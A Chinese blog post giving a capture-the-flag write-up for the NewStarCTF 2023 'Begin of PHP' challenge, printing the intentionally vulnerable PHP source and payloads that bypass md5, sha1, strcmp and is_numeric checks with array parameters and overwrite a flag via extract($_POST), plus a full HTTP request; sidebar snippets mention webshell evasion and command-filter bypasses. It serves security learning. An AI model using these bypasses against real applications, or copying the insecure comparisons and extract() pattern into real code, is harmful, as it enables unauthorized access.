记一道有意思的php验证绕过

于 2024-08-06 13:13:31 发布
阅读量198 收藏 4
点赞数 7
分类专栏: CTF靶场分享 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62626298/article/details/140953003
版权

[NewStarCTF 2023 公开赛道]Begin of PHP
 

<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

level1:

利用数组特性绕过level1

if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2']))

因为md5不能对数组进行加密,所以设置数据类型均为数组的时候就会全部返回null,使得两值相等

payload:?key1[]=11&key2[]=22

level2:

同上,数组绕过,返回值均为null

POST:  key3[]=1

level3:

strcmp漏洞 如果输入错误数据类型无法比较报错,执行的结果也是返回0,还是数组绕过

payload:?key1[]=11&key2[]=22&key4=[]=1

level4:

is_numeric 字符串绕过, 同样使用数组绕过对数字的验证

payload:?key1[]=11&key2[]=22&key4=[]=1&key5[]=1

level5:

两个重要函数函数:

extract: 给设定的变量赋值

foreach: 遍历键值对中的值

我们传的值设置为符号就可以绕过foreach中的匹配,但是当我们成功绕过我们发现,会多个flag5

然后查询了一些extract函数

发现其赋值的特性,所以在post中对flag5给个初始值就行,默认为true。

poc:

POST /?key1[]=1&key2[]=2&key4[]=1&key5[]=2 HTTP/1.1
Host: bbf8e61a-e278-4ff5-8654-112f880990a8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://bbf8e61a-e278-4ff5-8654-112f880990a8.node5.buuoj.cn:81
Connection: close
Referer: http://bbf8e61a-e278-4ff5-8654-112f880990a8.node5.buuoj.cn:81/?key1[]=1&key2[]=2&key4[]=1&key5[]=2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

key3%5B%5D=%22&flag5=%22

加冕@
关注
专栏目录
PHP WebShell 免杀
悦分享
08-01 6120
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~
jayq1的博客
10-02 1587
本篇文章在web方面属于中规中矩的解法,师傅们看着玩叭,在crypto方面是有一些知识扩展的,包括仿射密码、连分数等~
newstarctf 2023 week1
lgsyydsa的博客
11-13 172
buuctf里的新生赛(都停止提交了,flag也不知对不对)
[NewStarCTF 2023] web题解
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
CTF刷题
qq_45655136的博客
08-05 6641
刷题网站:bugku;BUUCTF 本文录了在刷题过程中所学到的知识点 坚持每天刷5题,持续更新 坚持就是胜利鸭 CTF 1、bugku–Simple_SSLI_1 根据题目SSLI即服务端模板注入攻击,服务段接收用户输入,将其作为web应用模板的一部分,渲染编译后执行恶意内容,导致敏感信息泄露、代码执行等。 直接F12,发现提示in the flask,set a secret_key flask模板,config是flask模板中的一个全局对象,包含了所有应用程序的配置值。 然后在url输入/?fl
[NewStarCTF 公开赛]
wxy_1234_的博客
04-15 1611
传入key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";能过滤掉基本都过滤了,其实正则匹配cat直接c${Z}at​可以执行cat,空格可以用${IFS}​绕过。抓包传入O:7:"ctfshow":2:{ctfshow}得到flag。post传入O:7:"ctfshow":2:{ctfshow}也没用。post传入O:7:"ctfshow":2:{}发现没用。
php代码审计比较有意思的例子
10-25
这就是如何通过巧妙的输入绕过转义机制,利用`str_replace()`实现SQL注入的一个示例。 为了避免这种情况,开发者应该始终使用预处理语句(如PDO或MySQLi的预处理语句)来执行SQL,而不是直接拼接字符串。预处理语句...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
友点 CMS V9.1 后台登录绕过 GetShell
Nginxx的博客
11-30 3268
友点 CMS V9.1 后台登录绕过 GetShell ,攻击者可无需任意权限即可登录后台并 getshell
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1184
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
NewStarCTF 2023 公开赛 Week1,网络安全基础视频教程
2401_83974607的博客
04-03 653
if name == ‘__main__’: n = gen_prime(32) e = 65537 m = bytes_to_long(flag) c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = get
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3472
【活着得,怎么就轻松惬意了,无需愧疚。】
NewStarCTF 2023 web
pwfortune的博客
04-21 1198
访问 /robots.txt 可以得到 flag{r0bots_1s_s0_us3ful访问 /www..zip 下载文件,有两个文件,放了flag(目录扫描)
NewStarCTF 2023 公开赛 Web
m0_73728268的博客
11-05 3688
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
NewStarCTF 2023 公开赛部分wp
m0_66458291的博客
10-02 488
参加NewStarCTF 2023 公开赛将自己做出来的题目进行总结一下,包括web和密码学两个部分的部分题目
CTFshow刷题日-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3378
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
[SWPUCTF 2023 秋季新生赛] web题解
rev1ve的博客
10-21 2104
然后就是上传的时候有两个if语句,第一个成立,第二个不成立。由于GET和POST传同一个参数没有先后顺序,所以不能用下面的方式去实现变量覆盖。分析一下,MD5和sha1都可以用数组绕过,然后用php伪协议中的data协议。分析一下,首先是参数名利用php解析特性;强等于,但是__wakeup方法会赋值,所以采取引用绕过的方式,exp如下。我们可以bp抓包,依次再三个参数fuzz测试(在页面处输入不了。考点:源码泄露,变量引用绕过__wakeup,php变量覆盖。打开题目,先试试普通一句话木马,发现被检测。
ctf web方向与php学习录29
这周末在做梦的博客
11-27 802
这里分享一道HECTF的题目 【BOOM】ezphp 一,源码 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2']
有意思的Java代码
最新发布
10-04
Java中有很多有趣的代码示例,它们通常展示了巧妙的设计、高级功能或者某种特定问题的解决方案。这里有一个经典的例子,展示了Java的lambda表达式和方法引用: ```java // 创建一个Person列表 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值